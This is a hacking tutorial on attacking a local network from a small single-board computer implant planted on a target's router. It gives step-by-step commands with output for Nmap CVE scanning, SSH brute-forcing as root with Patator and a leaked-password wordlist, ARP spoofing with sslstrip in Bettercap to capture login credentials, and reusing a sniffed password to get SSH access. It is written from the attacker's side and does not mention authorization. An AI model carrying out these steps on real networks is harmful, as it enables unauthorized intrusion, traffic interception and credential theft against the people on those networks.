How to Perform Network-Based Attacks with an SBC Implant

Jul 24, 2019 07:42 PM
636911355498076807.jpg

With a tiny computer, hackers can see every website you visit, exploit services on the network, and break into your Wi-Fi router's gateway to manipulate sensitive settings. These attacks can be performed from anywhere once the attacker's computer has been connected to the router via a network implant.

The Orange Pi Zero and Armbian operating system must first be set up for remote access and network-based attacks before proceeding. The operating system is not weaponized out of the box, so be sure to review my previous article on setting everything up first. This kind of attack can be performed with a Raspberry Pi as well, but the below installation commands were only tested with the Orange Pi Zero.

636911362451562809.jpg

tokyoneon/Null Byte

This article will focus on performing several network-based attacks after the Orange Pi Zero has been planted on the target router. The tools and attacks featured here are far from a complete depiction of how much damage an attacker can inflict on a network., but it's a good start to showing how dangerous a network implant can be in the wrong hands.

1. Perform Network Recon & CVE Detection with Nmap

Nmap is one of the essential network-mapping tools. We can begin by installing it on the Orange Pi Zero with the following apt-get commands.

root@orangepizero:~# apt-get update && apt-get install nmap

Next, install some useful NSE scripts such as the nmap-vulners and vulscan as shown in my previous article detecting CVEs with Nmap scripts. When those tools are loaded onto the Orange Pi Zero, we can start by identifying the IP address, netmask, and route given to the Orange Pi Zero by target router.

root@orangepizero:~# ip addr

3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether XX:XX:XX:XX:XX:XX brd ff:ff:ff:ff:ff:ff
    inet 192.168.8.138/24 brd 192.168.8.255 scope global dynamic eth0
       valid_lft 86056sec preferred_lft 86056sec
    inet6 xxxx::xxxx:xxxx:xxxx:xxxx/64 scope link
       valid_lft forever preferred_lft forever

We can see the 192.168.8.138/24 address and presume the router is at 192.168.8.1, verifiable with the ip route command. Then, perform a ping scan (-sn) on the entire network to discover available hosts.

root@orangepizero:~# nmap -sn 192.168.8.1/24

Starting Nmap 7.40 ( https://nmap.org ) at 2019-04-15 01:17 UTC
Nmap scan report for 192.168.8.1
Host is up (0.00038s latency).
MAC Address: XX:XX:XX:XX:XX:XX (Mediabridge Products)
Nmap scan report for 192.168.8.2
Host is up (0.00049s latency).
MAC Address: XX:XX:XX:XX:XX:XX (Mediabridge Products)
Nmap scan report for 192.168.8.179
Host is up (-0.088s latency).
MAC Address: XX:XX:XX:XX:XX:XX (Sony)
Nmap scan report for 192.168.8.183
Host is up (-0.10s latency).
MAC Address: XX:XX:XX:XX:XX:XX (Unknown)
Nmap scan report for 192.168.8.138
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.45 seconds

If, for example, we found the Sony device on 192.168.8.183 to be interesting, we could further probe that host.

root@orangepizero:~# nmap -sV -T4 --script nmap-vulners -F -A 192.168.8.183

Starting Nmap 7.40 ( https://nmap.org ) at 2019-04-15 01:19 UTC
Nmap scan report for 192.168.8.183
Host is up (0.00080s latency).
Not shown: 99 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| vulners:
|   cpe:/a:openbsd:openssh:7.6p1:
|   CVE-2018-15919      5.0     https://vulners.com/cve/CVE-2018-15919
|_  CVE-2018-15473      5.0     https://vulners.com/cve/CVE-2018-15473
MAC Address: 48:1C:52:9F:A6:71 (Unknown)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see the nmap-vulners NSE script discovered two CVEs with this particular SSH server. The host is almost certainly an Ubuntu machine, so automated updates have probably done a good job about patching severe security vulnerabilities.

We could further probe the service or other hosts on the network with more advanced Nmap scans and scripts. For more on Nmap, check out some of the following articles.

2. Perform Brute-Force Attacks with Patator

Like Hydra and Medusa, Patator is a highly flexible, full-featured, command-line brute-forcing tool. It has quickly become one of my favorite hacking instruments. In my previous article, Patator was used to perform a dictionary attack against different router gateways, which is very appropriate for a network-based attack such as this Orange Pi Zero hack. This time, however, I'll show Patator's SSH brute-forcing module.

First, install the necessary dependencies required by the Patator Python script. There are quite a few packages, so this process can take up to ten minutes to complete. Prepending the screen command (Screen should be installed) is recommended. In the event the SSH connection breaks, Screen will keep the installation running and accessible when the connection is re-established.

root@orangepizero:~# screen apt-get install libcurl4-openssl-dev python3-dev libssl-dev ldap-utils default-libmysqlclient-dev ike-scan unzip default-jdk libsqlite3-dev libsqlcipher-dev python-setuptools python-pip libpq-dev python-dev libffi6 libffi-dev pkg-config autoconf python-dev cmake

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  adwaita-icon-theme ca-certificates-java default-jdk default-jdk-headless default-jre default-jre-headless fontconfig fontconfig-config fonts-dejavu-core gtk-update-icon-cache hicolor-icon-theme ike-scan
  java-common ldap-utils libasyncns0 libatk-bridge2.0-0 libatk-wrapper-java libatk-wrapper-java-jni libatk1.0-0 libatk1.0-data libatspi2.0-0 libavahi-client3 libavahi-common-data libavahi-common3
  libcairo-gobject2 libcairo2 libcolord2 libcroco3 libcups2 libcurl4-openssl-dev libdatrie1 libdrm2 libegl1-mesa libepoxy0 libexpat1-dev libflac8 libfontconfig1 libfontenc1 libfreetype6 libgbm1
  libgdk-pixbuf2.0-0 libgdk-pixbuf2.0-common libgif7 libgl1-mesa-glx libglapi-mesa libgraphite2-3 libgtk-3-0 libgtk-3-common libgtk2.0-0 libgtk2.0-common libharfbuzz0b libice6 libjbig0 libjpeg62-turbo
  libjson-glib-1.0-0 libjson-glib-1.0-common liblcms2-2 libnspr4 libnss3 libogg0 libpango-1.0-0 libpangocairo-1.0-0 libpangoft2-1.0-0 libpixman-1-0 libpulse0 libpython3-dev libpython3.5 libpython3.5-dev
  librest-0.7-0 librsvg2-2 librsvg2-common libsm6 libsndfile1 libsoup-gnome2.4-1 libsqlcipher-dev libsqlcipher0 libsqlite3-dev libthai-data libthai0 libtiff5 libvorbis0a libvorbisenc2 libwayland-client0
  libwayland-cursor0 libwayland-egl1-mesa libwayland-server0 libx11-6 libx11-data libx11-xcb1 libxau6 libxaw7 libxcb-dri2-0 libxcb-dri3-0 libxcb-glx0 libxcb-present0 libxcb-render0 libxcb-shape0 libxcb-shm0
  libxcb-sync1 libxcb-xfixes0 libxcb1 libxcomposite1 libxcursor1 libxdamage1 libxdmcp6 libxext6 libxfixes3 libxft2 libxi6 libxinerama1 libxkbcommon0 libxmu6 libxmuu1 libxpm4 libxrandr2 libxrender1 libxshmfence1
  libxt6 libxtst6 libxv1 libxxf86dga1 libxxf86vm1 openjdk-8-jdk openjdk-8-jdk-headless openjdk-8-jre openjdk-8-jre-headless python3-dev python3.5-dev shared-mime-info x11-common x11-utils
0 upgraded, 131 newly installed, 0 to remove and 0 not upgraded.
Need to get 112 MB of archives.
After this operation, 312 MB of additional disk space will be used.
Do you want to continue? [Y/n]

Upgrade the setuptools and wheel packages using the following pip command.

root@orangepizero:~# pip install --upgrade setuptools wheel

Collecting setuptools
  Downloading https://files.pythonhosted.org/packages/c8/b0/cc6b7ba28d5fb790cf0d5946df849233e32b8872b6baca10c9e002ff5b41/setuptools-41.0.0-py2.py3-none-any.whl (575kB)
    100% |████████████████████████████████| 583kB 181kB/s
Installing collected packages: setuptools
  Found existing installation: setuptools 33.1.1
    Not uninstalling setuptools at /usr/lib/python2.7/dist-packages, outside environment /usr
Successfully installed setuptools-41.0.0

Clone the Patator GitHub repository with the git command.

root@orangepizero:~# git clone https://github.com/lanjelot/patator/ /opt/patator

Cloning into '/opt/patator'...
remote: Enumerating objects: 457, done.
remote: Total 457 (delta 0), reused 0 (delta 0), pack-reused 457
Receiving objects: 100% (457/457), 325.11 KiB | 149.00 KiB/s, done.
Resolving deltas: 100% (157/157), done.

Change (cd) into the new /opt/patator/ directory.

root@orangepizero:~# cd /opt/patator/

Then, use pip again to install more requirements. This process can take up to 20 minutes to complete. The pynacl and cryptography packages seemed to take especially long in my tests, so be patient.

root@orangepizero:/opt/patator# pip install -r requirements.txt

Downloading https://files.pythonhosted.org/packages/cf/ae/94e70d49044ccc234bfdba20114fa947d7ba6eb68a2e452d89b920e62227/paramiko-2.4.2-py2.py3-none-any.whl (193kB)
    100% |████████████████████████████████| 194kB 216kB/s
Collecting pycurl (from -r requirements.txt (line 2))
  Downloading https://files.pythonhosted.org/packages/e8/e4/0dbb8735407189f00b33d84122b9be52c790c7c3b25286826f4e1bdb7bde/pycurl-7.43.0.2.tar.gz (214kB)
    100% |████████████████████████████████| 215kB 172kB/s
Collecting ajpy (from -r requirements.txt (line 3))
  Downloading https://files.pythonhosted.org/packages/12/dd/e641d8c0b3b14eed50122a3c090ff9150bd0988fd0790d4819cd8083e83d/ajpy-0.0.4.tar.gz
Collecting pyopenssl (from -r requirements.txt (line 5))
  Downloading https://files.pythonhosted.org/packages/01/c8/ceb170d81bd3941cbeb9940fc6cc2ef2ca4288d0ca8929ea4db5905d904d/pyOpenSSL-19.0.0-py2.py3-none-any.whl (53kB)
    100% |████████████████████████████████| 61kB 66kB/s
Collecting cx_Oracle (from -r requirements.txt (line 6))
  Downloading https://files.pythonhosted.org/packages/4b/aa/99e49d10e56ff0263a8927f4ddb7e8cdd4671019041773f61b3259416043/cx_Oracle-7.1.2.tar.gz (289kB)
    100% |████████████████████████████████| 296kB 177kB/s
Collecting mysqlclient (from -r requirements.txt (line 7))
  Downloading https://files.pythonhosted.org/packages/f4/f1/3bb6f64ca7a429729413e6556b7ba5976df06019a5245a43d36032f1061e/mysqlclient-1.4.2.post1.tar.gz (85kB)
    100% |████████████████████████████████| 92kB 98kB/s
Collecting psycopg2-binary (from -r requirements.txt (line 8))
  Downloading https://files.pythonhosted.org/packages/dc/93/bb5655730913b88f9068c6b596177d1df83be0d476671199e17b06ea8436/psycopg2-binary-2.8.2.tar.gz (369kB)
    100% |████████████████████████████████| 378kB 169kB/s
Collecting pycrypto (from -r requirements.txt (line 9))
  Downloading https://files.pythonhosted.org/packages/60/db/645aa9af249f059cc3a368b118de33889219e0362141e75d4eaf6f80f163/pycrypto-2.6.1.tar.gz (446kB)
    100% |████████████████████████████████| 450kB 114kB/s

...

  Stored in directory: /root/.cache/pip/wheels/43/61/c8/0a4464601ce180d26e0a8dfdfa88c824e419dcc65bd43bda6e
  Running setup.py bdist_wheel for bcrypt ... done
  Stored in directory: /root/.cache/pip/wheels/6c/f0/60/8a8ebee44d14d3d6696f1e78960500777cb5b579caf33c1fe3
  Running setup.py bdist_wheel for pycryptodomex ... done
  Stored in directory: /root/.cache/pip/wheels/83/37/75/85a95885e1e48d22cc6c964680e7938a19ca7c80eb814b2ff0
  Running setup.py bdist_wheel for cffi ... done
  Stored in directory: /root/.cache/pip/wheels/bb/f8/22/e3e8d9dd87e0cc6df8201325bd0ae815e701d1ef2b95571cf2
Successfully built pycurl ajpy cx-Oracle mysqlclient psycopg2-binary pycrypto IPy pynacl cryptography bcrypt pycryptodomex cffi
Installing collected packages: cffi, pynacl, asn1crypto, enum34, ipaddress, cryptography, bcrypt, pyasn1, paramiko, pycurl, ajpy, pyopenssl, cx-Oracle, mysqlclient, psycopg2-binary, pycrypto, dnspython, IPy, pycryptodomex, ply, pysmi, pysnmp
Successfully installed IPy-1.0 ajpy-0.0.4 asn1crypto-0.24.0 bcrypt-3.1.6 cffi-1.12.2 cryptography-2.6.1 cx-Oracle-7.1.2 dnspython-1.16.0 enum34-1.1.6 ipaddress-1.0.22 mysqlclient-1.4.2.post1 paramiko-2.4.2 ply-3.11 psycopg2-binary-2.8.1 pyasn1-0.4.5 pycrypto-2.6.1 pycryptodomex-3.8.1 pycurl-7.43.0.2 pynacl-1.3.0 pyopenssl-19.0.0 pysmi-0.3.3 pysnmp-4.4.9

When that's done, verify Patator is working and view available modules with the --help option.

root@orangepizero:/opt/patator# ./patator.py --help

Patator v0.7 (https://github.com/lanjelot/patator)
Usage: patator.py module --help

Available modules:
  + ftp_login     : Brute-force FTP
  + ssh_login     : Brute-force SSH
  + telnet_login  : Brute-force Telnet
  + smtp_login    : Brute-force SMTP
  + smtp_vrfy     : Enumerate valid users using SMTP VRFY
  + smtp_rcpt     : Enumerate valid users using SMTP RCPT TO
  + finger_lookup : Enumerate valid users using Finger
  + http_fuzz     : Brute-force HTTP
  + rdp_gateway   : Brute-force RDP Gateway
  + ajp_fuzz      : Brute-force AJP
  + pop_login     : Brute-force POP3
  + pop_passd     : Brute-force poppassd (http://netwinsite.com/poppassd/)
  + imap_login    : Brute-force IMAP4
  + ldap_login    : Brute-force LDAP
  + smb_login     : Brute-force SMB
  + smb_lookupsid : Brute-force SMB SID-lookup
  + rlogin_login  : Brute-force rlogin
  + vmauthd_login : Brute-force VMware Authentication Daemon
  + mssql_login   : Brute-force MSSQL
  + oracle_login  : Brute-force Oracle
  + mysql_login   : Brute-force MySQL
  + mysql_query   : Brute-force MySQL queries
  + rdp_login     : Brute-force RDP (NLA)
  + pgsql_login   : Brute-force PostgreSQL
  + vnc_login     : Brute-force VNC
  + dns_forward   : Forward DNS lookup
  + dns_reverse   : Reverse DNS lookup
  + snmp_login    : Brute-force SNMP v1/2/3
  + ike_enum      : Enumerate IKE transforms
  + unzip_pass    : Brute-force the password of encrypted ZIP files
  + keystore_pass : Brute-force the password of Java keystore files
  + sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases
  + umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
  + tcp_fuzz      : Fuzz TCP services
  + dummy_test    : Testing module

The very same SSH service, discovered previously, can now be brute-forced using Patator's ssh_login module. To view the available ssh_login options, use the below command.

root@orangepizero:/opt/patator# ./patator.py ssh_login

Patator v0.7 (https://github.com/lanjelot/patator)
Usage: ssh_login <module-options ...> [global-options ...]

Examples:
  ssh_login host=10.0.0.1 user=root password=FILE0 0=passwords.txt -x ignore:mesg='Authentication failed.'

Module options:
  host          : target host
  port          : target port [22]
  user          : usernames to test
  password      : passwords to test
  auth_type     : type of password authentication to use [password|keyboard-interactive|auto]
  keyfile       : file with RSA, DSA or ECDSA private key to test
  persistent    : use persistent connections [1|0]

For a more complete, comprehensive list of options and arguments, use the ssh_login and --help options together.

root@orangepizero:/opt/patator# ./patator.py ssh_login --help

For demostration purposes, I'm using a wordlist created from leaked password databases. This can be quickly downloaded onto the Orange Pi Zero with the below wget command.

root@orangepizero:/opt/patator# wget 'https://git.io/fhhvc' -O /tmp/simple_wordlist.txt

--2019-04-15 02:19:09--  https://git.io/fhhvc
Resolving git.io (git.io)... 52.203.53.176
Connecting to git.io (git.io)|52.203.53.176|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt [following]
--2019-04-15 02:19:13--  https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.8.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.8.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25585 (25K) [text/plain]
Saving to: ‘/tmp/simple_wordlist.txt’

/tmp/simple_wordlist.txt                  100%[==============================>]  24.99K  59.7KB/s    in 0.4s

2019-04-15 02:19:22 (59.7 KB/s) - ‘/tmp/simple_wordlist.txt’ saved [25585/25585]

Finally, brute-force the SSH service using the following Patator command.

root@orangepizero:/opt/patator# ./patator.py ssh_login host=192.168.8.183 port=22 user=root password=FILE0 0=/tmp/simple_wordlist.txt -t 1

INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-04-14 07:25 UTC
INFO -
INFO - code  size    time | candidate                          |   num | mesg
INFO - -----------------------------------------------------------------------------
INFO - 1     22     2.005 | 123456                             |     1 | Authentication failed.
INFO - 1     22     2.277 | Abcdef123                          |     2 | Authentication failed.
INFO - 1     22     1.344 | a123456                            |     3 | Authentication failed.
INFO - 1     22     1.814 | little123                          |     4 | Authentication failed.
INFO - 1     22     2.081 | nanda334                           |     5 | Authentication failed.
INFO - 1     22     2.023 | N97nokia                           |     6 | Authentication failed.
INFO - 1     22     1.676 | password                           |     7 | Authentication failed.
INFO - 1     22     2.249 | Pawerjon123                        |     8 | Authentication failed.
INFO - 1     22     2.180 | 421uiopy258                        |     9 | Authentication failed.
INFO - 1     22     2.116 | MYworklist123                      |    10 | Authentication failed.
INFO - 1     22     1.879 | 12345678                           |    11 | Authentication failed.
INFO - 1     22     2.015 | qwerty                             |    12 | Authentication failed.
INFO - 1     22     1.772 | nks230kjs82                        |    13 | Authentication failed.
INFO - 1     22     2.212 | trustno1                           |    14 | Authentication failed.
INFO - 1     22     1.631 | zxcvbnm                            |    15 | Authentication failed.
INFO - 1     22     2.116 | N97nokiamini                       |    16 | Authentication failed.
INFO - 1     22     2.050 | letmein                            |    17 | Authentication failed.
INFO - 1     22     1.814 | 123456789                          |    18 | Authentication failed.
INFO - 1     22     2.107 | myplex                             |    19 | Authentication failed.
INFO - 1     22     0.042 | tokyoneon                          |    20 | Authentication failed.
INFO - 1     22     2.375 | gm718422@                          |    21 | Authentication failed.
INFO - 1     22     1.613 | churu123A                          |    22 | Authentication failed.
INFO - 1     22     1.914 | abc123                             |    23 | Authentication failed.
INFO - 1     22     1.820 | plex123                            |    24 | Authentication failed.
INFO - 1     22     1.778 | any123456                          |    25 | Authentication failed.
INFO - 1     22     2.048 | Lwf1681688                         |    26 | Authentication failed.

INFO - Hits/Done/Skip/Fail/Size: 26/26/0/0/26, Avg: 0 r/s, Time: 0h 0m 51s

Patator will brute-force the host= on the specified post= with the wordlist (0). To avoid overwhelming the SSH service with too many password attempts per second, use the -t to specify the number of concurrent threads. This value is set to ten by default, but increase and decrease it as needed.

3. Perform Man-in-the-Middle Attacks with Bettercap

Before installing Bettercap, the Go (Golang) programming language will need to be installed first. Bettercap relies on the later version of Golang that isn't available in the Debian repositories. To get the latest version of Golang, start by downloading the dependencies.

root@orangepizero:~# apt-get install libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev

Reading package lists... Done
Building dependency tree
Reading state information... Done
build-essential is already the newest version (12.3).
golang is already the newest version (2:1.7~5).
The following additional packages will be installed:
  libnetfilter-queue1 libnfnetlink-dev libpcap0.8-dev pkg-config
Recommended packages:
  libusb-1.0-doc
The following NEW packages will be installed:
  libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev libpcap-dev libpcap0.8-dev libusb-1.0-0-dev pkg-config
0 upgraded, 7 newly installed, 0 to remove and 0 not upgraded.
Need to get 405 kB of archives.
After this operation, 1,142 kB of additional disk space will be used.
Do you want to continue? [Y/n]

If you're not already root, change into the /root/ directory for the following commands. Using the /tmp directory isn't advised as the Orange Pi Zero may run out of memory during specific processes.

root@orangepizero:~# cd /root/

Then, download the tar.gz file containing the Golang source code.

root@orangepizero:~# wget 'https://dl.google.com/go/go1.12.7.linux-armv6l.tar.gz'

--2019-04-13 19:52:48--  https://dl.google.com/go/go1.12.7.linux-armv6l.tar.gz
Resolving dl.google.com (dl.google.com)... 172.217.194.93, 172.217.194.136, 172.217.194.190, ...
Connecting to dl.google.com (dl.google.com)|172.217.194.93|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 106218905 (101M) [application/octet-stream]
Saving to: ‘go1.12.7.linux-armv6l.tar.gz’

go1.12.7.linux-armv6l.tar.gz        100%[==============================>] 101.30M  3.28MB/s    in 34s

2019-04-13 19:53:22 (3.02 MB/s) - ‘go1.12.7.linux-armv6l.tar.gz’ saved [106218905/106218905]

Next, unpack the compressed tar.gz file.

root@orangepizero:~# tar -C /usr/local -xzf go1.*.tar.gz

The $PATH needs to be defined to perform the following commands.

root@orangepizero:~# export PATH=$PATH:/usr/local/go/bin

Now, before cloning the Bettercap repository, the amount of available "swap memory" on the Orange Pi Zero needs to be expanded. Swap is defined as part of the hard drive that has been allocated by the operating system as temporary memory. When the operating system has used up all of the available hardware RAM (512 MB for the Orange Pi Zero), it uses the swap.

To create a new swap area, use the below dd command to create a 2 GB (2048) file containing /dev/zero null data. This command should take about three minutes to complete.

root@orangepizero:~# dd if=/dev/zero of=/root/swapfile bs=1M count=2048

2048+0 records in
2048+0 records out
2147483648 bytes (2.1 GB, 2.0 GiB) copied, 195.927 s, 11.0 MB/s

Then, use the mkswap command. Disregard the "insecure permissions" warning. On a non-hacking system, this command would be executed differently. But it's not essential to this specific scenario.

root@orangepizero:~# mkswap /root/swapfile

mkswap: /root/swapfile: insecure permissions 0644, 0600 suggested.
Setting up swapspace version 1, size = 2 GiB (2147479552 bytes)
no label, UUID=e629a001-7a20-4346-8479-4a04fae459af

Enable the new swap area with the swapon command.

root@orangepizero:~# swapon /root/swapfile

swapon: /root/swapfile: insecure permissions 0644, 0600 suggested.

The new swap space can be verified using the free command to view available memory.

root@orangepizero:~# free -ht

total        used        free      shared  buff/cache   available
Mem:           493M         84M        9.0M        604K        399M        397M
Swap:          2.2G         19M        2.2G
Total:         2.7G        104M        2.2G

Notice the Swap: is over 2 GB. Now, back to the Bettercap install process. Clone the Bettercap GitHub repository with the following go command.

root@orangepizero:~# go get github.com/bettercap/bettercap

Then, define the $GOPATH with the export command.

root@orangepizero:~# export GOPATH=/root/go/

Change into the newly create Bettercap directory.

root@orangepizero:~# cd $GOPATH/src/github.com/bettercap/bettercap

Execute the make build command. No output will occur.

root@orangepizero:~/go/src/github.com/bettercap/bettercap# make build

Finally, install Bettercap with the make install command.

root@orangepizero:~/go/src/github.com/bettercap/bettercap# make install

To start using Bettercap, use the following command with the -iface option to specify the target (router) interface. Otherwise, Bettercap might attack devices authenticated to the Orange Pi Zero's Wi-Fi hotspot — if that was set up previously.

Screen is also recommended here. It will keep Bettercap running persistently if you choose to temporarily disconnect from the Orange Pi Zero and reconnect at a later time.

root@orangepizero:~/go/src/github.com/bettercap/bettercap# screen bettercap -iface eth0

bettercap v2.23 (built for linux arm with go1.12.4) [type 'help' for a list of commands]

192.168.8.0/24 > 192.168.8.138  »

For starters, we can use the help command to view available options and running modules.

10.#.#.#/24 > 10.#.#.##  »  help

help MODULE : List available commands or show module specific help if no module name is provided.
                active : Show information about active modules.
                  quit : Close the session and exit.
         sleep SECONDS : Sleep for the given amount of seconds.
              get NAME : Get the value of variable NAME, use * alone for all, or NAME* as a wildcard.
        set NAME VALUE : Set the VALUE of variable NAME.
  read VARIABLE PROMPT : Show a PROMPT to ask the user for input that will be saved inside VARIABLE.
                 clear : Clear the screen.
        include CAPLET : Load and run this caplet in the current session.
             ! COMMAND : Execute a shell command and print its output.
        alias MAC NAME : Assign an alias to a given endpoint given its MAC address.

Modules

      any.proxy > not running
       api.rest > not running
      arp.spoof > not running
      ble.recon > not running
        caplets > not running
    dhcp6.spoof > not running
      dns.spoof > not running
  events.stream > running
            gps > not running
            hid > not running
     http.proxy > not running
    http.server > not running
    https.proxy > not running
   https.server > not running
    mac.changer > not running
   mysql.server > not running
      net.probe > not running
      net.recon > not running
      net.sniff > not running
   packet.proxy > not running
       syn.scan > not running
      tcp.proxy > not running
         ticker > not running
             ui > not running
         update > not running
           wifi > not running
            wol > not running

192.168.8.0/24 > 192.168.8.138  »

Then, fetch the latest caplets from the Bettercap repository with the caplets.update command. Caplets are used to automate Bettercap commands and options.

10.#.#.#/24 > 10.#.#.##  »  caplets.update

[21:18:57] [sys.log] [inf] caplets downloading caplets from https://github.com/bettercap/caplets/archive/master.zip ...
[21:19:03] [sys.log] [inf] caplets installing caplets to /usr/local/share/bettercap/caplets ...

Use caplets.show to view the installed caplets and their location on the operating system. You are encouraged to review the caplet files for brief descriptions of what each one does.

10.#.#.#/24 > 10.#.#.##  »  caplets.show

┌─────────────────────────────────────┬────────────────────────────────────────────────────────────────────────────┬────────┐
│                Name                 │                                    Path                                    │  Size  │
├─────────────────────────────────────┼────────────────────────────────────────────────────────────────────────────┼────────┤
│ ap                                  │ /usr/local/share/bettercap/caplets/ap.cap                                  │ 307 B  │
│ crypto-miner/crypto-miner           │ /usr/local/share/bettercap/caplets/crypto-miner/crypto-miner.cap           │ 666 B  │
│ download-autopwn/download-autopwn   │ /usr/local/share/bettercap/caplets/download-autopwn/download-autopwn.cap   │ 2.6 kB │
│ fb-phish/fb-phish                   │ /usr/local/share/bettercap/caplets/fb-phish/fb-phish.cap                   │ 140 B  │
│ gitspoof/gitspoof                   │ /usr/local/share/bettercap/caplets/gitspoof/gitspoof.cap                   │ 216 B  │
│ gps                                 │ /usr/local/share/bettercap/caplets/gps.cap                                 │ 109 B  │
│ hstshijack/hstshijack               │ /usr/local/share/bettercap/caplets/hstshijack/hstshijack.cap               │ 799 B  │
│ http-req-dump/http-req-dump         │ /usr/local/share/bettercap/caplets/http-req-dump/http-req-dump.cap         │ 591 B  │
│ http-ui                             │ /usr/local/share/bettercap/caplets/http-ui.cap                             │ 382 B  │
│ https-ui                            │ /usr/local/share/bettercap/caplets/https-ui.cap                            │ 661 B  │
│ jsinject/jsinject                   │ /usr/local/share/bettercap/caplets/jsinject/jsinject.cap                   │ 210 B  │
│ local-sniffer                       │ /usr/local/share/bettercap/caplets/local-sniffer.cap                       │ 244 B  │
│ login-manager-abuse/login-man-abuse │ /usr/local/share/bettercap/caplets/login-manager-abuse/login-man-abuse.cap │ 236 B  │
│ mana                                │ /usr/local/share/bettercap/caplets/mana.cap                                │ 61 B   │
│ massdeauth                          │ /usr/local/share/bettercap/caplets/massdeauth.cap                          │ 302 B  │
│ mitm6                               │ /usr/local/share/bettercap/caplets/mitm6.cap                               │ 551 B  │
│ netmon                              │ /usr/local/share/bettercap/caplets/netmon.cap                              │ 42 B   │
│ pita                                │ /usr/local/share/bettercap/caplets/pita.cap                                │ 900 B  │
│ proxy-script-test/proxy-script-test │ /usr/local/share/bettercap/caplets/proxy-script-test/proxy-script-test.cap │ 57 B   │
│ rogue-mysql-server                  │ /usr/local/share/bettercap/caplets/rogue-mysql-server.cap                  │ 501 B  │
│ rtfm/rtfm                           │ /usr/local/share/bettercap/caplets/rtfm/rtfm.cap                           │ 210 B  │
│ simple-passwords-sniffer            │ /usr/local/share/bettercap/caplets/simple-passwords-sniffer.cap            │ 131 B  │
│ tcp-req-dump/tcp-req-dump           │ /usr/local/share/bettercap/caplets/tcp-req-dump/tcp-req-dump.cap           │ 413 B  │
│ web-override/web-override           │ /usr/local/share/bettercap/caplets/web-override/web-override.cap           │ 254 B  │
└─────────────────────────────────────┴────────────────────────────────────────────────────────────────────────────┴────────┘

To quickly enumerate active hosts on the network, invoke the netmon caplet with the include command.

10.#.#.#/24 > 10.#.#.##  »  include netmon

┌───────────────┬───────────────────┬─────────────┬────────────────────────────┬───────┬────────┬──────────┐
│     IP ▴      │        MAC        │    Name     │           Vendor           │ Sent  │ Recvd  │   Seen   │
├───────────────┼───────────────────┼─────────────┼────────────────────────────┼───────┼────────┼──────────┤
│ 192.168.8.138 │ XX:XX:XX:XX:XX:XX │ eth0        │                            │ 0 B   │ 0 B    │ 21:18:37 │
│ 192.168.8.1   │ XX:XX:XX:XX:XX:XX │ gateway     │ Mediabridge Products, LLC. │ 19 kB │ 8.6 kB │ 21:18:37 │
│               │                   │             │                            │       │        │          │
│ 192.168.8.179 │ XX:XX:XX:XX:XX:XX │             │ Sony Corporation           │ 32 kB │ 128 kB │ 21:20:24 │
│ 192.168.8.193 │ XX:XX:XX:XX:XX:XX │ Windows 10  │                            │ 916 B │ 1.3 kB │ 21:20:20 │
└───────────────┴───────────────────┴─────────────┴────────────────────────────┴───────┴────────┴──────────┘

↑ 54 kB / ↓ 433 kB / 4310 pkts

Alternatively, traffic transmitting between devices on the network can be sniffed by running the following six commands in order.

10.#.#.#/24 > 10.#.#.##  »  set http.proxy.sslstrip true
10.#.#.#/24 > 10.#.#.##  »  set arp.spoof.internal true
10.#.#.#/24 > 10.#.#.##  »  set net.sniff.verbose false
10.#.#.#/24 > 10.#.#.##  »  net.sniff on
10.#.#.#/24 > 10.#.#.##  »  http.proxy on
10.#.#.#/24 > 10.#.#.##  »  arp.spoof on

Bettercap will begin to display a ton of data transmitting over the network. In some cases, there may be servers and services running on the network that don't support HTTPS or use it by default. These are prime targets for tools like Bettercap.

Below is an example of a POST request made by a user authenticating to a media server running on one of the network devices.

POST /media_server/Users/authenticatebyname HTTP/1.1
Host: 192.168.8.183:8096
Accept-Encoding: gzip, deflate
X-media-Authorization: MediaBrowser Device="Firefox", DeviceId="TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjYuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Ni4wfDE1NTUzMTE3NzE5Mjg1", Version="4.0.2.0"
Content-Length: 46
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Referer: http://192.168.8.183:8096/web/index.html
Content-Type: application/json
Origin: http://192.168.8.183:8096
Accept: application/json
Accept-Language: en-US,en;q=0.5

{
  "Username": "tokyoneon",
  "Pw": "secure_password-321"
}

Bettercap displays the username and password data found in the login request. These credentials can be used to pivot to other devices on the network, for example, the previously discovered SSH server on 192.168.8.183. Now that the attacker has some sense of the target's preferred username and password scheme, they can test the credentials against other services on the network.

root@orangepizero:~# cd /opt/patator/
root@orangepizero:/opt/patator# ./patator.py ssh_login host=192.168.8.183 port=22 user=tokyoneon password='secure_password-321' -t 1

INFO - code  size    time | candidate                          |   num | mesg
INFO - -----------------------------------------------------------------------------
INFO - 0     39     0.117 |                                    |     1 | SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3

INFO - Hits/Done/Skip/Fail/Size: 1/1/0/0/1, Avg: 0 r/s, Time: 0h 0m 1s

